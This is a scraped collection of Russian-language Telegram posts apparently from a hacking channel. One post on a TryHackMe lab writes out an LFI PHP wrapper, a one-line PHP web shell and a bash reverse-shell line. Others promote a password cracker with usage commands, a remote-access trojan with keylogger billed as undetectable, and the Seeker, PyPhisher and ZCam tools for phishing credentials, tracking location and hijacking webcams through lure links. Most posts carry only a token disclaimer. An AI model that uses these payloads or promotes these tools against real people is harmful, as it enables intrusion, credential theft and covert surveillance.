[PYTHON:TODAY]
☠️ Как стать хакером? ⚡️ Большая практика по хакингу и пентесту для новичков 🔥 Ломаем сайт, раскучиваем LFI уязвимость, RCE и отравление логов на сервере 🌵 PHP и BASH Reverse shell 🕳 Что такое PHP wrapper и как с их помощью проникать на сайт Если интересна…
✍️ Софт и команды из видео
🖥 Большой выбор бесплатных машин
https://tryhackme.com/
🖥 Машина из видео
https://tryhackme.com/room/watcher
🔎 Nmap под разные ОС
https://nmap.org/download.html
🗂 Перебор директорий - dirsearch
https://github.com/maurosoria/dirsearch
☠️ pwncat
https://github.com/calebstewart/pwncat
⌨️ Rustscan
🖥 Большой выбор бесплатных машин
https://tryhackme.com/
🖥 Машина из видео
https://tryhackme.com/room/watcher
🔎 Nmap под разные ОС
https://nmap.org/download.html
🗂 Перебор директорий - dirsearch
https://github.com/maurosoria/dirsearch
☠️ pwncat
https://github.com/calebstewart/pwncat
⌨️ Rustscan
$ rustscan -a ipaddr⌨️ php wrapper
php://filter/convert.base64-encode/resource=index⌨️ php shell
<?php system($_GET['cmd'])?>⌨️ sh reverse shell
echo "/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'" >> backup.sh#pentest #redteam #youtube
👍43❤4
NoSQLMap — инструмент Python с открытым исходным кодом, предназначенный для аудита, а также для автоматизации атак путем внедрения и использования слабых сторон конфигурации по умолчанию в базах данных NoSQL и веб-приложениях, использующих NoSQL, для раскрытия или клонирования данных из базы данных.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #pentest #github #soft #python
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #pentest #github #soft #python
👍45❤9😱4
☠️ Как стать хакером?
⚡️ Большая пошаговая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию
🌵 Энумерация
🌵 SQL инъекции
🌵 Взлом хэшей паролей
🌵 Поиск субдоменов и директорий
🌵 Reverse shell
🌵 Повышение привилегий
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/chC6DWwOiKc
#youtube #pentest #redteam
⚡️ Большая пошаговая практика по хакингу и пентесту для новичков
🔥 Ломаем сайт на Wordpress, раскучиваем SQL инъекцию
🌵 Энумерация
🌵 SQL инъекции
🌵 Взлом хэшей паролей
🌵 Поиск субдоменов и директорий
🌵 Reverse shell
🌵 Повышение привилегий
Если интересна тема пентеста и хакинга на практике, поддержите видео лайком и комментарием на YouTube. Спасибо за поддержку! 💪
https://youtu.be/chC6DWwOiKc
#youtube #pentest #redteam
🔥56👍18❤8🤯2
Forwarded from NetStalkers
Шпаргалка по Kali Linux
🔸 SQLMap Examples
🔸 Metasploit
🔸 Exploit Research
🔸 Password Cracking
🔸 Username Enumeration
🔸 HTTP / HTTPS Webserver Enumeration
🔸 DNSRecon
🔸 NMAP Commands и д.р
#redteam #pentest #github
🔸 SQLMap Examples
🔸 Metasploit
🔸 Exploit Research
🔸 Password Cracking
🔸 Username Enumeration
🔸 HTTP / HTTPS Webserver Enumeration
🔸 DNSRecon
🔸 NMAP Commands и д.р
#redteam #pentest #github
👍38🔥5❤1
🔥 Полезные библиотеки Python
CompressedCrack - простой и эффективный скрипт для подбора паролей к zip и rar архивам.
Установка:
Нас интересует скрипт crack.py который принимает несколько параметров:
🌵 min_character: минимальное количество символов в пароле.
🌵 max_character: максимальное количество символов в пароле.
🌵 characters: используемые в пароле символы по которым будет осуществляться перебор, 123qwerty!@$ и т.д.
#python #soft #github #redteam
CompressedCrack - простой и эффективный скрипт для подбора паролей к zip и rar архивам.
Установка:
$ git clone https://github.com/thanhminh6996/CompressedCrack.gitИспользование:
$ cd ./CompressedCrack
Нас интересует скрипт crack.py который принимает несколько параметров:
$ python crack.py -i file_name min_character max_character characters🌵 -i file_name : путь до архива.
🌵 min_character: минимальное количество символов в пароле.
🌵 max_character: максимальное количество символов в пароле.
🌵 characters: используемые в пароле символы по которым будет осуществляться перебор, 123qwerty!@$ и т.д.
$ python crack.py -i file.zip 1 5 1234567890⚙️ GitHub/Инструкция
#python #soft #github #redteam
👍65🔥13❤4🤯1😱1
KIZAGAN — троян для удаленного доступа, написанный на python.
Может снимать снимки с камеры жертвы, записывать звуки микрофона, скриншоты... Также внутри него есть кейлоггер, и по заявлению автора - его невозможно обнаружить.
⚙️ GitHub/Инструкция
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
#python #soft #github #redteam
Может снимать снимки с камеры жертвы, записывать звуки микрофона, скриншоты... Также внутри него есть кейлоггер, и по заявлению автора - его невозможно обнаружить.
⚙️ GitHub/Инструкция
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
#python #soft #github #redteam
👍96🔥12❤9🤯5
🔥 Полезные библиотеки Python
Seeker — интересная утилита позволяющая узнавать геолокацию человека. Делается это с помощью создания фишинговой страницы и последующей генерации ссылки, по которой переходит человек.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
Установка:
Использование:
⚙️ GitHub/Инструкция
#python #github #redteam
Seeker — интересная утилита позволяющая узнавать геолокацию человека. Делается это с помощью создания фишинговой страницы и последующей генерации ссылки, по которой переходит человек.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
Установка:
$ git clone https://github.com/thewhiteh4t/seeker.git
$ cd seeker/
$ chmod +x install.sh
$ ./install.sh
Использование:
$ python3 seeker.py -h
⚙️ GitHub/Инструкция
#python #github #redteam
👍85🔥6🤯2😱1
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 Полезные библиотеки Python
PyPhisher - лучший инструмент для фишинга на Python. Включает в себя популярные веб-сайты, такие как facebook, twitter, instagram, github, reddit, gmail и многие другие.
Скрипт генерирует ссылки для фишинга популярных социальных сетей и как только username входит в систему, учетные данные перехватываются хакером.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
PyPhisher - лучший инструмент для фишинга на Python. Включает в себя популярные веб-сайты, такие как facebook, twitter, instagram, github, reddit, gmail и многие другие.
Скрипт генерирует ссылки для фишинга популярных социальных сетей и как только username входит в систему, учетные данные перехватываются хакером.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
👍77🫡21😱5🔥4🤯3❤2
🔥 Полезные библиотеки Python
💻 Photon — невероятно быстрый сканер, разработанный для OSINT.
Может извлекать следующие данные во время сканирования:
🌵 URL-адреса (входящие и не входящие)
🌵 URL-адреса с параметрами ( example.com/gallery.php?id=2)
🌵 Intel (электронная почта, учетные записи в социальных сетях, корзины Amazon и т. д.)
🌵 Файлы (pdf, png, xml и т. д.)
🌵 Секретные ключи (ключи авторизации/API и хэши)
🌵 Файлы JavaScript и присутствующие в них конечные точки
🌵 Строки, соответствующие пользовательскому шаблону регулярного выражения
🌵 Субдомены и данные, связанные с DNS
💬 Установка:
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
💻 Photon — невероятно быстрый сканер, разработанный для OSINT.
Может извлекать следующие данные во время сканирования:
🌵 URL-адреса (входящие и не входящие)
🌵 URL-адреса с параметрами ( example.com/gallery.php?id=2)
🌵 Intel (электронная почта, учетные записи в социальных сетях, корзины Amazon и т. д.)
🌵 Файлы (pdf, png, xml и т. д.)
🌵 Секретные ключи (ключи авторизации/API и хэши)
🌵 Файлы JavaScript и присутствующие в них конечные точки
🌵 Строки, соответствующие пользовательскому шаблону регулярного выражения
🌵 Субдомены и данные, связанные с DNS
💬 Установка:
$ git clone https://github.com/s0md3v/Photon.git
$ cd Photon
$ pip install requirements.txt
$ python photon.py
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
👍64🔥13❤8🎉1
🔥 Полезные библиотеки Python
ZCam - утилита позволяет получать доступ к чужой веб-камере с помощью Python скрипта, который генерирует специальную ссылку для отправки цели.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
ZCam - утилита позволяет получать доступ к чужой веб-камере с помощью Python скрипта, который генерирует специальную ссылку для отправки цели.
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
⚙️ GitHub/Инструкция
#redteam #github #soft #python
👍79🔥15🤯12❤5😱5